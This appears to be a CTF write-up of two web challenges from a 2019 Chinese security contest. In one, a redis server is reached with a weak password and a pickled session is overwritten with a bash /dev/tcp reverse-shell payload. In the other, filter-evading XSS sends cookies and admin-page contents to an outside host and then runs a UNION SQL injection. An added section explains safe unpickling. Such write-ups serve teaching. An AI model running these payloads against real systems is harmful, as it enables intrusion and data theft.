菠萝吹雪's Studio.

2019/07/09

# 2019 CISCN (national collegiate cybersecurity contest), East/North China regional onsite finals: writeups for 2 web challenges

### Preface
Exams are over, so I started reproducing the CISCN onsite challenges I could not solve at the time. The other players are incredibly strong (tql).

#### 1. vegetable
This is the HCTF 2018 challenge warmup, reused as-is.

#### 2. cookie
Hints: "redis weak password" and "do you know pickle?"
The challenge opens with a login page.

After registering and logging in you land on a "flag claim system" page.
(screenshot: 1.png)

The only usable feature is editing your profile.
(screenshot: 2.png)

Since the hint mentions redis, I port-scanned the target with nmap; redis listens on 6379 by default.
(screenshot: 3.png)

The hint says weak password. A redis brute-force script I had collected earlier got nothing, but Metasploit's redis login module (auxiliary/scanner/redis/redis_login) found it: the password is chocolate.
(screenshot: 4.png)

With redis access, the next step is a shell. The standard approaches are writing a webshell into the web root (CONFIG SET dir / dbfilename, then SAVE) or writing an SSH public key into /root/.ssh/authorized_keys and logging in with the matching private key; both need the redis process to be able to write to those directories, and neither worked here.
(screenshot: 5.png)

Back to the other hint, pickle: the shell must come from pickle deserialization, but at first I did not see how to reach it.
While logged into redis I listed the keys and noticed that the key names are identical to the session cookie, and that the values are pickled.
(screenshot: 6.png)

That ties it to pickle: on login the application pickles the session (username and password) and stores it in redis under the cookie value. If the value under our own cookie is replaced with a pickle that spawns a reverse shell, the next request carrying that cookie (logging in again) unpickles it and the shell comes back.
(screenshot: 7.png)

My exploit:

```python
# -*- coding: utf-8 -*-
import os
import pickle
import redis


class payload(object):
    # __reduce__ makes the unpickler call os.system(<reverse shell command>)
    def __reduce__(self):
        return (os.system, ('bash -i >& /dev/tcp/***.*.***.*/7777 0<&1',))


if __name__ == "__main__":
    a = payload()
    b = pickle.dumps(a)   # generate this on Linux, not Windows (see the pitfall below)
    print(b)
    # overwrite the pickled session stored under our own cookie value
    pool = redis.ConnectionPool(host='**.***.**.***', port=6379, password='chocolate', db=0)
    r = redis.Redis(connection_pool=pool)
    cookie = '4444444444f922c94de3056c70e88ad225a4d61de5'
    r.set(cookie, b)
```

The shell came back. (The pitfall: a pickle built on Windows is not the same as one built on Linux, and for a long time the Windows-built one never popped a shell. The reason is that pickle records os.system under the module it really lives in, which is `nt` on Windows and `posix` on Linux; a payload dumped on Windows therefore references `nt.system`, which does not exist on the Linux target, so unpickling fails before the command runs.)
(screenshot: 9.png)
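To make the unpickle step concrete, here is an added example of my own, not code from the writeup or from the challenge: it builds the same os.system payload, lists the module.name pairs a pickle will import (which is exactly where the Windows `nt` versus Linux `posix` difference shows up), hand-writes a protocol-0 pickle whose module name is chosen explicitly so it loads on the target no matter where it was generated, and contrasts the application's apparent `pickle.loads` of the redis value with a restricted unpickler that rejects every global. A dict stands in for redis, the session contents are constructed, and the cookie value is the one from the exploit above.

```python
# Added example, not from the writeup: the unpickle step behind the redis
# session, the nt/posix pitfall, and the loader the application should have had.
import io
import os
import pickle
import pickletools


class ReverseShell:
    """Same trick as the exploit: unpickling calls os.system(cmd)."""

    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def build_payload(cmd, protocol=0):
    """What pickle.dumps produces on the attacker's box. os.system is recorded
    under the module it really lives in: 'posix' on Linux, 'nt' on Windows."""
    return pickle.dumps(ReverseShell(cmd), protocol=protocol)


def portable_payload(cmd, module="posix"):
    """Hand-written protocol-0 pickle with the module name chosen explicitly,
    so it loads on a Linux target no matter where it was generated:
    GLOBAL module.system, MARK, UNICODE cmd, TUPLE, REDUCE, STOP."""
    if "\n" in cmd:
        raise ValueError("a newline would terminate the UNICODE opcode")
    return (b"c" + module.encode("ascii") + b"\nsystem\n"
            b"(V" + cmd.encode("raw_unicode_escape") + b"\ntR.")


def referenced_globals(data):
    """Every module.name the unpickler would import (and may call).
    Protocols 0-3 use GLOBAL 'module name'; protocol 4+ pushes the two strings
    and then STACK_GLOBAL, so remember the most recent string pushes."""
    strings, found = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
                       "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"):
            strings.append(arg)
        elif op.name == "GLOBAL":
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":
            found.append((strings[-2], strings[-1]))
    return found


def benign_session(user):
    """A legitimate session value (constructed): a dict of strings, no globals."""
    return pickle.dumps({"user": user}, protocol=0)


def load_session_unsafe(store, cookie):
    """What the challenge app evidently does: trust whatever sits under the cookie key."""
    return pickle.loads(store[cookie])


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global: dicts, lists, str, int and bytes need none, so a
    session store has no reason to import anything during load."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def load_session_safe(store, cookie):
    return RestrictedUnpickler(io.BytesIO(store[cookie])).load()


if __name__ == "__main__":
    store = {}  # stands in for redis (constructed)
    cookie = "4444444444f922c94de3056c70e88ad225a4d61de5"  # cookie from the exploit
    store[cookie] = benign_session("alice")
    print(load_session_safe(store, cookie))          # {'user': 'alice'}
    print(referenced_globals(build_payload("id")))   # [('posix', 'system')] on Linux, [('nt', 'system')] on Windows
    store[cookie] = portable_payload("exit 3")       # harmless stand-in for the reverse shell
    print(referenced_globals(store[cookie]))         # [('posix', 'system')]
    print(load_session_unsafe(store, cookie))        # the command runs: os.system returns 768 (3 << 8) on POSIX
    try:
        load_session_safe(store, cookie)
    except pickle.UnpicklingError as e:
        print("blocked:", e)
```

Run it on Linux: the unsafe loader really executes the stand-in command, which is the whole point, while the restricted loader raises before anything runs. A session that only contains dicts and strings never calls find_class at all, so an allow-list of nothing is the right default for this data; the real fix is not to pickle untrusted bytes at all, for example by storing the session as JSON under a random session id.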

#### 3. babyxss
The page imitates XianZhi (先知社区): it has an article submission form and a feedback form. The usual approach is to put an XSS payload into a submission and steal the admin's cookie when they review it.
(screenshot: 10.png)

Then fuzzing. The filter blocks (, ), \, //, \\, ', =, src, '' and their URL-encoded forms, and a CSP is set, but it allows unsafe-eval and unsafe-inline, so inline script and eval() still run. Plan: pass the real code through String.fromCharCode so that no quotes, parentheses or = appear literally. HTML character references are not filtered, so the two parentheses that must actually execute can be written as &#40 and &#41 inside <svg><script>, where the HTML parser decodes character references (inside a plain HTML <script> it would not, since that content is raw text). Tried with <svg>:

```html
<svg><script>eval&#40String.fromCharCode&#40 97,108,101,114,116,40,120,115,115,41&#41&#41;</script>
```

Success: the character codes decode to alert(xss) and it fires.
Next, try to grab the admin's cookie.
Constructed payload:

```html
<svg><script>eval&#40String.fromCharCode&#40 119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,104,116,116,112,58,47,47,105,112,46,112,111,114,116,63,99,61,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101&#41&#41;</script>
```

(The codes decode to window.location.href=http://ip.port?c=+document.cookie, with the collaborator address redacted as ip.port.)

The admin's cookie never arrived, although the payload did send back my own cookie.
Change of approach: I found admin.php.
Load admin.php in an iframe (it is same-origin with the XSS, so the framed document is readable; a cross-origin frame would not be) and use onload plus setInterval to keep sending the framed page's body out. The decoded JavaScript (the iframe URL here already carries the SQL injection used in the final step):

```javascript
var iframe=document.createElement("iframe");
iframe.src="/admin.php?id=-1 union select 1,2,flagg from flag";
document.body.appendChild(iframe);
// every second, send the framed page's <body> to the collaborator (address redacted as ip.port);
// the interval id is assigned to onload, but setInterval already starts the polling on its own
iframe.onload=setInterval(function(){
  var c=encodeURI(document.getElementsByTagName("iframe")[0].contentWindow.document.getElementsByTagName("body")[0].innerHTML);
  window.location.href="http://ip.port?c="+c
},1000);
```

This returned the contents of admin.php:

```html
<head>
<meta charset="UTF-8">
<title>Featured Articles</title>
<link href="/static/css/main.css" rel="stylesheet">
<link href="https://cdn.bootcss.com/twitter-bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">
<div class="header clearfix">
<nav>
<ul class="nav nav-pills pull-right">
<li role="presentation"><a href="/">Home</a></li>
<li role="presentation"><a href="post.php">Submit</a></li>
<li role="presentation"><a href="commitbug.php">Feedback</a></li>
<li role="presentation"><a href="about.php">About me</a></li>
</ul>
</nav>
<h3 class="text-muted">Featured Articles</h3>
</div>

<form method="GET" role="form">

<div class="form-group">
<label>Enter the id of the user to look up</label>
<div class="input-group">
<div class="input-group-addon">User ID</div>
<input class="form-control" type="text" name="id" placeholder="Enter an ID.">
</div>
</div>

<button type="submit" class="btn btn-default">Query</button>
</form><br>
</div>
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.js"></script>
<script src="/static/js/main.js"></script>

</body>
```

There is a query function, so the next step is SQL injection, again driven through the XSS with the result sent back the same way.
Nothing is filtered there: a plain UNION injection returns the flag.
Final payload:

```html
<svg><script>eval&#40String.fromCharCode&#40 118,97,114,32,105,102,114,97,109,101,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,105,102,114,97,109,101,46,115,114,99,61,34,47,97,100,109,105,110,46,112,104,112,63,105,100,61,45,49,32,117,110,105,111,110,32,115,101,108,101,99,116,32,49,44,50,44,102,108,97,103,103,32,102,114,111,109,32,102,108,97,103,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,105,102,114,97,109,101,41,59,105,102,114,97,109,101,46,111,110,108,111,97,100,61,115,101,116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,99,61,101,110,99,111,100,101,85,82,73,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,105,102,114,97,109,101,34,41,91,48,93,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,105,110,110,101,114,72,84,77,76,41,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,58,47,47,34,105,112,46,112,111,114,116,34,63,99,61,34,43,99,125,44,49,48,48,48,41,59&#41&#41;</script>
```

(screenshot: QQ图片20190707171540.png)

### Afterword
Back to studying.
